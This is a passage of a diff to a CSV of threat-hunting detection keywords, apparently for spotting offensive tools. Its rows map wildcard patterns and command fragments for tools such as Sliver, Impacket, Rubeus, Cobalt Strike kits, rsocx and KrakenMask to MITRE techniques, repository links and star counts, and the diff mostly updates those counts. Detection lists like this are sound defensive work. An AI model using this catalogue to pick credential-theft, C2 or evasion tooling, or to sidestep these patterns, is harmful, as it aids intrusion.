TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpc-kill.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpcmap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rpc-msf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*rpcrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpcdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpcdump_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc-hijack.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - 
T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpc-kill.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcmap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rpc-msf.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*rpcrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*rpcrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*rpcrt4_new.dll*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - 
T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*rpcrt4_old.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","29","6","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" -"*rpc-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*rpc-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*rpivot.zip*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpivot-master*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpm.torproject.org/*public_gpg.key*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rsactftool --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rsactftool* --dumpkey --key *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*rshijack*","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. 
then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","5","402","41","2023-06-03T16:37:11Z","2018-02-23T02:21:45Z" -"*rsmudge/ElevateKit*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*rsmudge/ElevateKit*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*rsocx -l 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -r *:*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -t 0.0.0.0*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" 
@@ -15960,19 +16141,19 @@ "*rsocx-main.zip*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*RtlDallas/KrakenMask*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" "*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*rubber_ducky.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Rubeus*currentluid*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus*harvest*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus*logonsession*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus*monitor*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.bin*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Rubeus.Commands*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*rubber_ducky.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Rubeus*currentluid*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*harvest*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*logonsession*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus*monitor*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.bin*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Rubeus.Commands*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Rubeus.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*Rubeus.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*Rubeus.git*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.Kerberos*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*Rubeus.lib*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Rubeus.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
